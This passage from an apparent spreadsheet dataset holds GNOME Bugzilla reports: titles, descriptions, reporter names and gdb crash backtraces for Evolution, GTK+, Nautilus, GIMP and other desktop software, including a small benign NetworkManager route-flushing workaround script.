	modtimes = (GHashTable *) 0x8321940
	attachments = (GHashTable *) 0x8321968
	rn = 
	iter = (E2kResultIter *) 0x818c898
	result = (E2kResult *) 0x0
	modtime = 0x8144f28 H\005\030\b-04-07T20:03:40.531Z
	status = 200
	ctx = 
	i = 
	status_tracking = 
	__PRETTY_FUNCTION__ = get_changed_events
#24 0xb66db9bf in g_thread_create_proxy (data=0x815fb08) at gthread.c:635
	__PRETTY_FUNCTION__ = g_thread_create_proxy
#25 0xb648e192 in start_thread (arg=0xb29ffb90) at pthread_create.c:296
	__res = 
	__ignore1 = 
	__ignore2 = 
	pd = (struct pthread *) 0xb29ffb90
	now = 
	unwind_buf = {cancel_jmp_buf = {{jmp_buf = {-1236676620 0 4001536 
        -1298139976 -1248292963 465432980} mask_was_saved = 0}} priv = {
    pad = {0x0 0x0 0x0 0x0} data = {prev = 0x0 cleanup = 0x0 
      canceltype = 0}}}
	not_first_call = 0
	robust = 
#26 0xb62f502e in clone () from /lib/libc.so.6
	fstab_state = {fs_fp = 0x0 fs_buffer = 0x0 fs_mntres = {
    mnt_fsname = 0x0 mnt_dir = 0x0 mnt_type = 0x0 mnt_opts = 0x0 
    mnt_freq = 0 mnt_passno = 0} fs_ret = {fs_spec = 0x0 fs_file = 0x0 
    fs_vfstype = 0x0 fs_mntops = 0x0 fs_type = 0x0 fs_freq = 0 
    fs_passno = 0}}
	__elf_set___libc_subfreeres_element_fstab_free__ = (
    const void *) 0xb63306f0
Thread 1 (Thread 0xb61eb8d0 (LWP 19218)):
#0  0xffffe410 in __kernel_vsyscall ()
No symbol table info available.
#1  0xb6494c1e in __lll_mutex_lock_wait () from /lib/libpthread.so.0
No symbol table info available.
#2  0xb6490a58 in _L_mutex_lock_86 () from /lib/libpthread.so.0
No symbol table info available.
#3  0xb649047d in __pthread_mutex_lock (mutex=0x80e5000)
    at pthread_mutex_lock.c:81
	ignore1 = 
	ignore2 = 
	oldval = 
	retval = 
	__PRETTY_FUNCTION__ = __pthread_mutex_lock
#4  0xb6ffb453 in exchange_account_set_online (account=0x80abe98)
    at exchange-account.c:1200
	__PRETTY_FUNCTION__ = exchange_account_set_online
#5  0x0806077d in stub_connect (stub=0x80ad910 pwd=0x8105c88 passwd)
    at mail-stub-exchange.c:3263
	mse = (MailStubExchange *) 0x80ad910
	account = (ExchangeAccount *) 0x80abe98
	result = 134612555
	ctx = 
	retval = 
	uri = 
	mode = 2
#6  0x0806451e in connection_handler (source=0x8117d18 condition=G_IO_IN 
    data=0x80ad910) at mail-stub.c:104
	pwd = 0x8105c88 passwd
	command = 0
#7  0xb66e7dad in g_io_unix_dispatch (source=0x811f700 
    callback=0x8063aa0  user_data=0x80ad910)
    at giounix.c:162
	buffer_condition = 0
#8  0xb66b37c6 in g_main_context_dispatch (context=0x80b09c8) at gmain.c:2064
No locals.
#9  0xb66b6bb2 in g_main_context_iterate (context=0x80b09c8 block=1 
    dispatch=1 self=0x8086190) at gmain.c:2697
	got_ownership = 
	max_priority = 2147483647
	timeout = 281
	some_ready = 1
	nfds = 
	allocated_nfds = 
	fds = (GPollFD *) 0x811c460
	__PRETTY_FUNCTION__ = g_main_context_iterate
#10 0xb66b6f97 in g_main_loop_run (loop=0x80d9648) at gmain.c:2905
	got_ownership = -1236728800
	self = (GThread *) 0x8086190
	__PRETTY_FUNCTION__ = g_main_loop_run
#11 0xb6df9ea3 in bonobo_main () at bonobo-main.c:311
	loop = (GMainLoop *) 0x80d9648
#12 0x0805b254 in main (argc=3 argv=) at main.c:238
	path = 0x80d6b70 \001
#0  0xffffe410 in __kernel_vsyscall ()
The program is running.  Quit anyway (and detach it)? (y or n) [answered Y input not from terminal]
----------- .xsession-errors (25065 sec old) ---------------------
** (gnome-cups-icon:3586): WARNING **: IPP request failed with status 1030
** (gnome-cups-icon:3586): WARNING **: IPP request failed with status 1030
** (gnome-cups-icon:3586): WARNING **: IPP request failed with status 1030
** (gnome-cups-icon:3586): WARNING **: IPP request failed with status 1030
** (gnome-cups-icon:3586): WARNING **: IPP request failed with status 1030
** (gnome-cups-icon:3586): WARNING **: IPP request failed with status 1030
** (gnome-cups-icon:3586): WARNING **: IPP request failed with status 1030
...Too much output ignoring rest...
--------------------------------------------------</t>
  </si>
  <si>
    <t>GTK+-80234</t>
  </si>
  <si>
    <t>GtkWindow missing properties</t>
  </si>
  <si>
    <t>GtkWindow is missing various properties type_hint and decorated
are two obvious ones.</t>
  </si>
  <si>
    <t>EVOLUTION-222867</t>
  </si>
  <si>
    <t>Forwarding multiple messages</t>
  </si>
  <si>
    <t xml:space="preserve">Package: Evolution
Priority: Normal
Version: 1.0.3.99
Synopsis: Forwarding multiple messages
Bugzilla-Product: Evolution
Bugzilla-Component: Mailer
Description:
Select two messages and hit Ctrl-F to forward. Only a single message
(the second) is forwarded. It seems that Evo should forward both
messages or refuse to forward any messages but not arbitrarily pick a
message to forward.
</t>
  </si>
  <si>
    <t>hazard</t>
  </si>
  <si>
    <t>CONGLOMERATE-125883</t>
  </si>
  <si>
    <t>Add information on how to support a doctype to website</t>
  </si>
  <si>
    <t>It'd be good to have information on how to support a new doctype within
Conglomerate as it's fairly easy and immediately makes the app more
useful to different people but it's currently obscure and undocumented.
This is a reminder to me to write up how to do it.</t>
  </si>
  <si>
    <t>GNOME-VFS-66996</t>
  </si>
  <si>
    <t>configure adds -I/usr/include which breaks stuff</t>
  </si>
  <si>
    <t>The configure check for openssl adds -I/usr/include if it doesn't have to
add any -I's to find the include files (I set CPPFLAGS). This breaks the
build on non-linux platforms with gcc because gcc has its own stdarg.h
but instead it gets the one from /usr/include which doesn't work.
Configure should never add -I/usr/include or -L/usr/lib ...</t>
  </si>
  <si>
    <t>stric</t>
  </si>
  <si>
    <t>GSTREAMER-133817</t>
  </si>
  <si>
    <t>add support for disc number tag</t>
  </si>
  <si>
    <t>The attached patch adds support for tags indicating the current disc number
and the total number of discs for multi-cd albums. I also modified the mad
plugin and the shared vorbiscomment code to handle it. 
I only tested the mad plugin though.</t>
  </si>
  <si>
    <t>TRACKER-528339</t>
  </si>
  <si>
    <t>string_replace function in tracker-configuration.c is broken</t>
  </si>
  <si>
    <t>Please describe the problem:
The string_replace function in tracker-configuration.c doesn't work.  start_pos is not initialized to the beginning of the string and the end_pos and start_pos variables are swapped in the append function.
Steps to reproduce:
1. Add several newlines to end of tracker.cfg
2. Run tracker-preferences
Actual results:
segfault in string_replace
Expected results:
Any occurrence of needle in haystack should be replaced with replacement
Does this happen every time?
Yes
Other information:
Patch attached.  Probably needs more thorough testing</t>
  </si>
  <si>
    <t>jgerrish</t>
  </si>
  <si>
    <t>STRAW-408388</t>
  </si>
  <si>
    <t>Tooltip Typo -- you guys got online/offline backwards</t>
  </si>
  <si>
    <t>Hello
So this being open source madness people notice really silly bugs. You lads have a connected icon on the bottom left. When its plugged together the tooltip says 'you are offline click to go online'. When its unplugged with the x the tooltip says 'you are online click to go offline'.
Upon further investigation I discovered that the icon had it right not the tooltip :)
So that should be an easy one to fix eh?</t>
  </si>
  <si>
    <t>garoth</t>
  </si>
  <si>
    <t>NAUTILUS-417193</t>
  </si>
  <si>
    <t>Selecting the current location triggers folder update</t>
  </si>
  <si>
    <t>Please describe the problem:
This ``bug'' happens when selecting a bookmark that points to the current Nautilus location. If your current location is x and you activate a bookmark that points to x the content of the main window gets repainted.
I don't know if this is an intended behaviour (there's a Reload button in the toolbar and CTRL+R F5 work as well) anyway I find it mostly annoying especially since repeatedly clicking the same bookmark bring CPU usage to 100%.
On a side note the GtkFileChooser behaves just like Nautilus...
Steps to reproduce:
Actual results:
Expected results:
Does this happen every time?
Other information:</t>
  </si>
  <si>
    <t>GNOME-GAMES-SUPERSEDED-406790</t>
  </si>
  <si>
    <t>glchess</t>
  </si>
  <si>
    <t>glchess flashes on --help</t>
  </si>
  <si>
    <t>Try glchess --help. You'll notice a window that appears and then disappears quickly. I suppose it's due to late use of gnome.program_init.</t>
  </si>
  <si>
    <t>BEAGLE-393766</t>
  </si>
  <si>
    <t>RTF filter does not work on lots of documents</t>
  </si>
  <si>
    <t>Please describe the problem:
RTF filter does not work on lots of RTF files. Also it is quite slow. It definitely needs a rework.
Steps to reproduce:
I will attach a couple of RTF files which has text that should be extracted but they arent.
Actual results:
Expected results:
Does this happen every time?
Other information:
Mono internally an RTF parser. Currently an RTF filter based included in a branch
http://svn.gnome.org/svn/beagle/branches/beagle-cutting-edge-branch/Filters/
The modified filter is very fast and correct in text extraction but there is no code to extract metadata information. The code can be merged to trunk once the metadata extraction is written.</t>
  </si>
  <si>
    <t>EVOLUTION-210983</t>
  </si>
  <si>
    <t>evolution cannot create new messages</t>
  </si>
  <si>
    <t xml:space="preserve">Package: Evolution
Priority: Blocker
Version: 0.14
Synopsis: evolution cannot create new messages
Bugzilla-Product: Evolution
Bugzilla-Component: Mailer
Description:
On an Sunblade 1000 with Ximian gnome evolution 0.14
does not allow me to create a new message:
I get a message: Could not create compose window and also
Unable to retrieve message from editor.
Also I get Gtk-Warnings when I start up evolution on this machine
of the form:
Gtk-WARNING **: Unable to locate loadable module in module_path:
libpixmap.so
Unknown reporter: carlson@lanl.gov changed to bugbuddy-import@ximian.com.
</t>
  </si>
  <si>
    <t>carlson</t>
  </si>
  <si>
    <t>EPIPHANY-128814</t>
  </si>
  <si>
    <t>re-enable font filtering</t>
  </si>
  <si>
    <t>Pre-1.0 we disabled font filtering in the prefs dialogue and always show
the whole list for all fonts languages. That was because of a fontconfig
bug which is fixed now so we should re-enable filtering.</t>
  </si>
  <si>
    <t>GIMP-118741</t>
  </si>
  <si>
    <t>Brush subpixel sampling introduces banding</t>
  </si>
  <si>
    <t>The routine gimp_paint_core_subsample_mask can cause banding in the brush mask.
This can be seen when painting with large (400pixel+) soft .vbr type brushes.</t>
  </si>
  <si>
    <t>jaycox</t>
  </si>
  <si>
    <t>EVOLUTION-213466</t>
  </si>
  <si>
    <t>Calendar application crashes when selecting print preview</t>
  </si>
  <si>
    <t xml:space="preserve">Package: Evolution
Priority: Critical
Version: 0.16.99
Synopsis: Calendar application crashes when selecting print preview 
Bugzilla-Product: Evolution
Bugzilla-Component: Calendar
Description:
On a Red Hat 6.2 with upgraded Kernels.  I fire up evolution select
calendar from the bar on the left.  I select the month view.  I then
go to file and select print preview.  It is at this point that an
error comes up saying that the app has crashed.  In previous versions of
Evolution I would go to the calendar print preview and the print preview
would show up.  But not without the following problems: when looking at
the month view the grid lines would not appear on the print preview
nor would they print on the printer.
Debugging Information:
0x40b218c9 in __wait4 () from /lib/libc.so.6
#0  0x40b218c9 in __wait4 () from /lib/libc.so.6
#1  0x40b801cc in ?? () from /lib/libc.so.6
#2  0x40780975 in waitpid (pid=12100 stat_loc=0xbffff270 options=0)
    at wrapsyscall.c:134
#3  0x402d27ff in gnome_segv_handle (signum=11) at gnome-init.c:659
#4  0x4077f532 in pthread_sighandler (signo=11 ctx={gs = 0 __gsh = 0 
      fs = 0 __fsh = 0 es = 43 __esh = 0 ds = 43 __dsh = 0 edi = 0 
      esi = 136664864 ebp = 3221222900 esp = 3221222892 ebx = 1075606200 
      edx = 0 ecx = 57 eax = 3221222992 trapno = 14 err = 4 
      eip = 1077106022 cs = 35 __csh = 0 eflags = 2163346 
      esp_at_signal = 3221222892 ss = 43 __ssh = 0 fpstate = 0xbffff370 
      oldmask = 2147483648 cr2 = 0}) at signals.c:96
#5  0x40aaec48 in __restore ()
    at ../sysdeps/unix/sysv/linux/i386/sigaction.c:127
#6  0x401a0721 in gp_gc_concat (gc=0x8255758 matrix=0xbffff650) at gp-gc.c:182
#7  0x40177764 in gnome_print_concat (pc=0x8255720 matrix=0xbffff650)
    at gnome-print.c:553
#8  0x40178877 in gnome_print_rotate (pc=0x8255720 theta=90)
    at gnome-print.c:818
#9  0x80ac6ad in print_calendar (gcal=0x81985b0 preview=1 date=1003899600 
    default_view=PRINT_VIEW_MONTH) at print.c:2291
#10 0x80758e3 in print (gcal=0x81985b0 preview=1) at calendar-commands.c:126
#11 0x8075923 in file_print_preview_cb (uic=0x8226c58 data=0x81985b0 
    path=0x8254d54 CalendarPrintPreview) at calendar-commands.c:145
#12 0x4099e7f2 in impl_Bonobo_UIComponent_execVerb (servant=0x8226cb4 
    cname=0x8254d54 CalendarPrintPreview ev=0xbffff774)
    at bonobo-ui-component.c:129
#13 0x408be32a in _ORBIT_skel_Bonobo_UIComponent_execVerb (
    _ORBIT_servant=0x8226cb4 _ORBIT_recv_buffer=0x81946b8 ev=0xbffff774 
    _impl_execVerb=0x4099e73c )
    at Bonobo-skels.c:4419
#14 0x4093eae9 in ORBit_POA_handle_request (recv_buffer=0x81946b8 
    poa=0x813bb50) at orbit_poa.c:507
#15 0x40941c06 in ORBit_handle_incoming_request (recv_buffer=0x81946b8)
    at server.c:90
#16 0x40941f11 in ORBit_handle_incoming_message (recv_buffer=0x81946b8)
    at server.c:160
#17 0x4095bc0e in giop_main_handle_connection (connection=0x81971f0)
    at connection.c:1211
#18 0x408fcee7 in orb_handle_connection (source=0x8197290 cond=G_IO_IN 
    cnx=0x81971f0) at oaf-mainloop.c:69
#19 0x405614ba in g_io_unix_dispatch (source_data=0x81972a8 
    current_time=0xbffff8a8 user_data=0x81971f0) at giounix.c:135
#20 0x405629f6 in g_main_dispatch (dispatch_time=0xbffff8a8) at gmain.c:656
#21 0x40562fb1 in g_main_iterate (block=1 dispatch=1) at gmain.c:877
#22 0x40563129 in g_main_run (loop=0x81972c0) at gmain.c:935
#23 0x4047e64a in gtk_main () at gtkmain.c:524
#24 0x408cf0a2 in bonobo_main () at bonobo-main.c:283
#25 0x80a772b in main (argc=3 argv=0xbffff954) at main.c:126
#0  0x40b218c9 in __wait4 () from /lib/libc.so.6
No locals.
#1  0x40b801cc in ?? () from /lib/libc.so.6
No symbol table info available.
#2  0x40780975 in waitpid (pid=12100 stat_loc=0xbffff270 options=0)
    at wrapsyscall.c:134
stat_loc = (int *) 0xbffff270
options = 0
result = 0
oldtype = 0
#3  0x402d27ff in gnome_segv_handle (signum=11) at gnome-init.c:659
estatus = 1080430412
in_segv = 1
pid = 0
#4  0x4077f532 in pthread_sighandler (signo=11 ctx={gs = 0 __gsh = 0 
      fs = 0 __fsh = 0 es = 43 __esh = 0 ds = 43 __dsh = 0 edi = 0 
      esi = 136664864 ebp = 3221222900 esp = 3221222892 ebx = 1075606200 
      edx = 0 ecx = 57 eax = 3221222992 trapno = 14 err = 4 
      eip = 1077106022 cs = 35 __csh = 0 eflags = 2163346 
      esp_at_signal = 3221222892 ss = 43 __ssh = 0 fpstate = 0xbffff370 
      oldmask = 2147483648 cr2 = 0}) at signals.c:96
self = 0x40786920
in_sighandler = 0x0
#5  0x40aaec48 in __restore ()
    at ../sysdeps/unix/sysv/linux/i386/sigaction.c:127
No locals.
#6  0x401a0721 in gp_gc_concat (gc=0x8255758 matrix=0xbffff650) at gp-gc.c:182
gc = (GPGC *) 0xfffffe00
matrix = (gdouble *) 0x0
ctx = (GPCtx *) 0xfffffe00
#7  0x40177764 in gnome_print_concat (pc=0x8255720 matrix=0xbffff650)
    at gnome-print.c:553
pc = (GnomePrintContext *) 0x8255720
ret = 0
Unknown reporter: jmielke@linuxforbroadcsters.com changed to bugbuddy-import@ximian.com.
</t>
  </si>
  <si>
    <t>jmielke</t>
  </si>
  <si>
    <t>GTKHTML-249570</t>
  </si>
  <si>
    <t>Translation of Mail Compose window changes on focus change</t>
  </si>
  <si>
    <t xml:space="preserve">Package: Evolution
Priority: Normal
Version: 1.4.5
Synopsis: Translation of Mail Compose window changes on focus change
Bugzilla-Product: Evolution
Bugzilla-Component: Calendar
Description:
Description of Problem:
I'm using Evolution 1.4.5 (from the Debian package) and the German
localisation. When I write a new EMail the Mail Compose windows pops
up where I type the text address ... (don't know if the original
english name of the window is correct).
The menubar has the entries: 
  Datei Bearbeiten Format Ansicht Insert Sicherheit
When I leave the window with the mouse and thus the focus changes to
another window the menubar's entries are as follows:
   Datei Edit Format Ansicht Insert Sicherheit
So the second entry Bearbeiten changes to the original english label
Edit.
When the focus returns to the window (when the mouse is above it) the
german label appears again.
BTW: The Insert label should be called EinfÃ¼gen for the German
version.
Setting qa contact to the default for this product.
   This bug either had no qa contact or an invalid one.
</t>
  </si>
  <si>
    <t>NAUTILUS-40746</t>
  </si>
  <si>
    <t>views from metadata merged badly</t>
  </si>
  <si>
    <t xml:space="preserve">The metadata should no longer specify names for explicitly enabled view
components the oafinfo file for the component should know that. Further views
will appear twice on the list if they are selected both automatically and
explicitly.
Also components might be provided in this explicit list which do not think they
are applicable but it is not wholly clear how to best fix that.
------- Additional Comments From sullivan@eazel.com 2000-09-08 15:27:52 ----
Setting all bugs to P6 to start official bug-prioritization plan. Please don't
set the priority to anything other than P6 unless you've got the gold seal of
approval for doing so.
------- Additional Comments From eli@eazel.com 2000-10-16 19:41:14 ----
Batch-assigning QA ownership of remaining bugs to eli@eazel.com
------- Bug moved to this database by unknown@bugzilla.gnome.org 2001-09-09 21:18 -------
</t>
  </si>
  <si>
    <t>SOUND-JUICER-449330</t>
  </si>
  <si>
    <t>sound-juicer fails to build against minimum allowed external dependencies</t>
  </si>
  <si>
    <t>sound-juicer uses MBE_AlbumGetAlbumArtistName which was introduced in libmusicbrainz-2.1.3 (according to http://musicbrainz.org/news/client.html).  We either need to update http://live.gnome.org/TwoPointNineteen/ExternalDependencies or get this use reverted.  I'd suggest the former could you send a simple proposal (a couple sentences is all that is really needed) and then we can update this?</t>
  </si>
  <si>
    <t>GNOME-UTILS-394941</t>
  </si>
  <si>
    <t>screenshot</t>
  </si>
  <si>
    <t>Missing Icon in Interactive Dialog</t>
  </si>
  <si>
    <t>I will attach a patch to fix the missing icon and a few small HIG issues for the interactive dialog.</t>
  </si>
  <si>
    <t>GNOME-CONTROL-CENTER-22898</t>
  </si>
  <si>
    <t>Solid-color background selection gives wrong colors</t>
  </si>
  <si>
    <t xml:space="preserve">Package:  control-center
Severity: normal
Version:  1.2.1
Synopsis: Solid-color background selection gives wrong colors
Class:    sw-bug
Distribution: Red Hat Linux release 6.0 (Hedwig)
System: Linux 2.4.0-test6 i586 unknown
C library: glibc-2.1.1-6
C compiler: egcs-2.91.66
glib: 1.2.8
GTK+: 1.2.8
ORBit: ORBit 0.5.3
gnome-libs: gnome-libs 1.2.4
libxml: 1.8.9
gnome-print: gnome-print-0.20
gnome-core: gnome-core 1.2.1
Description:
When a solid color is selected for the background and wallpaper is set
to None the wrong color is given: the Green value seems to be
completely ineffective the Red and Blue values seem to provide various
different shades of Green and Blue. The problem is gone when using a
Gradient background.
------- Bug moved to this database by debbugs-export@bugzilla.gnome.org 2001-01-27 16:37 -------
This bug was previously known as bug 22898 at http://bugs.gnome.org/
http://bugs.gnome.org/show_bug.cgi?id=22898
Originally filed under the control-center product and general component.
Unknown version 1.2.x in product control-center. Setting version to the default unspecified.
The original reporter (dunbare@golden.net) of this bug does not have an account here.
Reassigning to the exporter debbugs-export@bugzilla.gnome.org.
Reassigning to the default owner of the component bugmeister@canvas.gnome.org.
</t>
  </si>
  <si>
    <t>dunbare</t>
  </si>
  <si>
    <t>GIMP-138754</t>
  </si>
  <si>
    <t>path_get_point_at_dist() is unimplemented</t>
  </si>
  <si>
    <t>See function path_get_point_at_dist_invoker in paths_cmds.c</t>
  </si>
  <si>
    <t>gd32</t>
  </si>
  <si>
    <t>GNUMERIC-51058</t>
  </si>
  <si>
    <t>MVC Confusion</t>
  </si>
  <si>
    <t>(Version is Gnumeric CVS 0.62 possibly affected aswell)
1) Start Gnumeric
2) Create several Unshared views of the workbook
3) Close one of the views.
Observe how all other views close too. The name unshared however implies
that the views of the workbook are not connected in that way. Even weirder
is that if you repeat the same steps and instead create shared views the
behaviour is exacly the opposite (not all views are closed if one is
closed) This is rather confusing.</t>
  </si>
  <si>
    <t>GNOME-MEDIA-75110</t>
  </si>
  <si>
    <t>gnome-cd is not session aware</t>
  </si>
  <si>
    <t>Steps to reproduce the problem
------------------------------
1. Start a gnome-2 session.
2. Start gnome-cd from the command prompt.
3. Type save-session from command prompt.
4. Log out from the session [Panel:Actions:LogOut].
5. Start the gnome-2 session again.
gnome-cd should come up. But it does not.</t>
  </si>
  <si>
    <t>deepa.chacko</t>
  </si>
  <si>
    <t>GTRANSLATOR-454922</t>
  </si>
  <si>
    <t>Instalation problem</t>
  </si>
  <si>
    <t>Can someone fix instalation problem? 
Becouse i don't know anything about autotools and that.</t>
  </si>
  <si>
    <t>GALEON-84940</t>
  </si>
  <si>
    <t>History dialog shouldn't have an ok button</t>
  </si>
  <si>
    <t>This is sort of a sticky issue. I guess to be higly correct galeon should
have a close button not ok in the history dialog
But what should the button ordering be??? I'm not sure and I feel this is
one of the inconsistencies of our hig(close buttons are evil) but none the
less galeon should follow the hig I guess. 
CCing usability-maint maybe they should decide if the button ordering
should be [clear] [close] or [close][clear].
Not sure...alternatively maybe the clear button can be placed somewhere
else in the ui so that the dialog only has a close button on the bottom
this would sidestep the issue a little i guess.</t>
  </si>
  <si>
    <t>DRWRIGHT-117997</t>
  </si>
  <si>
    <t>DRWRIGHT</t>
  </si>
  <si>
    <t>Please use plural forms in drwright</t>
  </si>
  <si>
    <t>Please read Christian's explanation of the problem and solution at
http://developer.gnome.org/doc/tutorials/gnome-i18n/developer.html#plurals
#: src/drwright.c:461
# c-format
msgid %d minutes until the next break
#: src/drwright.c:464
msgid One minute until the next break
I'll attach a patch for this below though it might not be the patch you'd
like (One minute will become 1 minute feel free to change that).
If you don't mind this patch I can commit this myself.</t>
  </si>
  <si>
    <t>danilo</t>
  </si>
  <si>
    <t>EVOLUTION-231911</t>
  </si>
  <si>
    <t>Evolution crashes when re-setting mail fetching intervals</t>
  </si>
  <si>
    <t>Please fill in this template when reporting a bug unless you know what you
are doing.
Description of Problem:
Evolution crashed several times under the same circumstances and with the 
same results. Here's what happened:
1. I wanted to change the frequency between times that Evolution checks
for mail from 10 to 5 minute intervals.
2. I opened Tools&gt; Mail Settings&gt; Evolution Account Editor&gt; Receiving&gt; 
for one of the four accounts
3. The window froze and did not respond to clicking on any of the
buttons or tabs.
4. I went to the main Evolution window to exit the application. The
pull-down menu came down but the there was no response to clicking on
Exit (or anything else).
5. As I moved the windows around the contents of each bled in its
window and across each other.
6. I logged-out without exiting the application but when I logged-in
again Evolution would not open.
7. I shut down.
8. I rebooted and opened Evolution.
9. I was greeted with the Set-up assistant and had to set up all of the
accounts again as all four had been deleted.
Steps to reproduce the problem:
1. I repeated the above scenario several times with the same results each
time as described.
2. 
3. 
Actual Results: The application crashed i.e. the windows' contents bled
all over themselves and across open windows and rendered Evolution
unusable. I could not exit the application normally nor clear the debris of
the windows from the screen. 
Expected Results: I had hoped that re-booting and trying again would solve
the problem. It didn't.
How often does this happen? Every time that I try to re-set the interval
time between fetching mail.
Additional Information:</t>
  </si>
  <si>
    <t>kjmorris</t>
  </si>
  <si>
    <t>GTK+-308722</t>
  </si>
  <si>
    <t>bookmark_list_write</t>
  </si>
  <si>
    <t>This looks like it ought to build a GString and call g_file_set_contents.
(For all the usual umask reasons.)</t>
  </si>
  <si>
    <t>GNOME-CORE-58960</t>
  </si>
  <si>
    <t>Session properties capplet [Help] in wrong browser</t>
  </si>
  <si>
    <t>The session properties capplet does:
  tmp = gnome_help_file_find_file (control-center
session.html#STARTUP-PROGS)
  if (tmp) {
    gnome_help_goto (NULL tmp)
    g_free(tmp)
  } else {
    GtkWidget *mbox
    mbox = gnome_message_box_new(_(No help is available/installed for
these settings. Please make sure you\nhave the GNOME User's Guide installed
on your system.)
                                 GNOME_MESSAGE_BOX_ERROR
                                 _(Close) NULL)
    gtk_widget_show(mbox)
  }
To load help but this ends up loading a file: URL instead of 
a ghelp: url so you get Mozilla instead of Nautilus for your
help browser. It should just call gnome_help_display() like
everywhere else.</t>
  </si>
  <si>
    <t>NETWORKMANAGER-352731</t>
  </si>
  <si>
    <t>fake route is added to loopback when using link-local address obtained by zeroconf</t>
  </si>
  <si>
    <t>Please describe the problem:
A fake route is (also) added (before the correct one) to the routing tables when NM obtaines a link-local ip addr by zeroconf. The packets therefore go to a wrong way. To work around you only have to remove the fake route
Steps to reproduce:
1. Start NM.
2. obtain a link-local address
3. try to figure out why nothing works
Actual results:
the packets go wrong way
Expected results:
for example ping to work
Does this happen every time?
yes it does.
Other information:
a simple workaround is present: add the following script ot the /etc/NetworkManager/dispatcher.d drectory make it executeable and us NM-dispatcher as well. Here comes the script:
#!/bin/sh
if [ $1 == eth0 ] then
        if [ $2 == up ] then
                if [ `/sbin/route | grep lo | grep 169.254 | wc -c ` -gt 0 ]  then
                        /sbin/ip route flush dev lo
                        logger NetworkManagerDispatcher::kill_fake_loopback_routes.sh: Once again a Link-local adress has been obtained... so I have to do my work... to work around: )
                fi
        fi
fi</t>
  </si>
  <si>
    <t>gilgalad</t>
  </si>
  <si>
    <t>VTE-388692</t>
  </si>
  <si>
    <t>dynamically generated extremely long titles in gnome-terminal-2.16.1 cause the term to momentarily freeze</t>
  </si>
  <si>
    <t>Please describe the problem:
I have a script that generates a long command (wc output = 1 164 4520). gnome-terminal tries to put the entire string into the terminal title bar and causes the terminal to freeze.
Steps to reproduce:
1. Generate a really long command e.g. one with 4500+ characters or bytes
2. It causes gnome-terminal to dynamically put that command into the title bar of the window
Actual results:
the gnome-terminal window freezes for a few seconds.
Expected results:
the gnome-terminal shouldn't freeze
Does this happen every time?
yes
Other information:
Why not put a limit on the length of string that is malloc'd and put into the title bar of the gnome-terminal rather than trying to shove everything into it?</t>
  </si>
  <si>
    <t>t35t0r</t>
  </si>
  <si>
    <t>EVOLUTION-316071</t>
  </si>
  <si>
    <t>evolution crashes on quit</t>
  </si>
  <si>
    <t>This bug has been opened here: http://bugzilla.ubuntu.com/show_bug.cgi?id=15175
Evolution crashes when I quit.
This only happens when I used the mail view. 
I have two imap servers added.
Just before the crash dialog opens i can see the number of messages in the
Unmatched vfolder go up the number is back to normal on the next run.
This is the last message on the command line:
camel-ERROR **: file camel-object.c: line 242 (cobject_finalise): assertion
failed: (o-&gt;ref_count == 0)
aborting...
...
&gt; Thanks for your bug. What version of evolution/ubuntu do you use? Seems to be
the same issue as http://bugzilla.gnome.org/show_bug.cgi?id=269903.
...
I'm running breezy evolution version 2.4.0-0ubuntu2.
The crash happens every time no matter if i use 'quit' or 'close'.
I think it is related to my profile I removed one of my imap servers yesterday
added it again and everything worked fine but today I'm back to 'crash every
time on quit'.
Maybe I should delete the whole profile and re-setup evolution copying my
tasks contacts and calenders to the new profile ?
...
&gt; Could you get a backtrace with debug packages installed
(https://wiki.ubuntu.com/DebuggingProgramCrash) before moving the files?
...
&gt; Thanks for the backtrace it's still not a debug one though. Do you use some
vFolder as decribed by http://bugzilla.gnome.org/show_bug.cgi?id=306345 comments?
...
Hi yes it is definitly vfolder related deleting all vfolders and creating new
ones fixes the problem.
Using host libthread_db library /lib/tls/libthread_db.so.1.
(gdb) run --sync
Starting program: /usr/bin/evolution --sync
[Thread debugging using libthread_db enabled]
[New Thread -1230809408 (LWP 6326)]
adding hook target 'source'
[New Thread -1239077968 (LWP 6333)]
[New Thread -1247466576 (LWP 6334)]
[New Thread -1255855184 (LWP 6335)]
[New Thread -1264243792 (LWP 6336)]
[New Thread -1273631824 (LWP 6337)]
[New Thread -1284080720 (LWP 6338)]
Program received signal SIGABRT Aborted.
[Switching to Thread -1284080720 (LWP 6338)]
0xb78b4ab7 in raise () from /lib/tls/libc.so.6
(gdb) thread apply all bt full
Thread 7 (Thread -1284080720 (LWP 6338)):
#0  0xb78b4ab7 in raise () from /lib/tls/libc.so.6
No symbol table info available.
#1  0xb78b6349 in abort () from /lib/tls/libc.so.6
No symbol table info available.
#2  0xb6b54774 in g_logv () from /usr/lib/libglib-2.0.so.0
No symbol table info available.
#3  0xb6b547a8 in g_log () from /usr/lib/libglib-2.0.so.0
No symbol table info available.
#4  0xb6b54814 in g_assert_warning () from /usr/lib/libglib-2.0.so.0
No symbol table info available.
#5  0xb7d9c82d in cobject_finalise (o=0x8259998) at camel-object.c:242
No locals.
#6  0xb7d9dec4 in camel_object_unref (vo=0x8259998) at camel-object.c:925
	o = (CamelObject *) 0x8259998
	klass = (CamelObjectClass *) 0x822c310
	k = (CamelObjectClass *) 0x817a3e0
	hooks = (CamelHookList *) 0x824f340
#7  0xb677c25c in folder_changed_free (session=0x81d18f8 msg=0x8241638) at
camel-vee-folder.c:1429
	m = (struct _folder_changed_msg *) 0x8241638
#8  0xb676db44 in session_thread_msg_free (session=0x81d18f8 msg=0x8241638) at
camel-session.c:503
No locals.
#9  0xb658af03 in ms_thread_msg_free () from
/usr/lib/evolution/2.4/components/libevolution-mail.so
No symbol table info available.
#10 0xb676df7a in camel_session_thread_msg_free (session=0x81d18f8
msg=0x8241638) at camel-session.c:605
No locals.
#11 0xb676dbac in session_thread_destroy (thread=0x8566188 msg=0x8241638
session=0x81d18f8) at camel-session.c:514
No locals.
#12 0xb7a15357 in thread_destroy_msg (e=0x8566188 m=0x8241638) at e-msgport.c:810
	func = 0xb676db88 
	func_data = (void *) 0x81d18f8
#13 0xb7a155cb in thread_dispatch (din=0x8566188) at e-msgport.c:913
	e = (EThread *) 0x8566188
	m = (EMsg *) 0x8241638
	info = (struct _thread_info *) 0x0
	self = 3010886576
#14 0xb71f71ee in start_thread () from /lib/tls/libpthread.so.0
No symbol table info available.
#15 0xb795503e in clone () from /lib/tls/libc.so.6
No symbol table info available.
Thread 6 (Thread -1273631824 (LWP 6337)):
#0  0xb71f9af1 in pthread_cond_wait@@GLIBC_2.3.2 () from /lib/tls/libpthread.so.0
No symbol table info available.
#1  0xb7961c77 in pthread_cond_wait () from /lib/tls/libc.so.6
No symbol table info available.
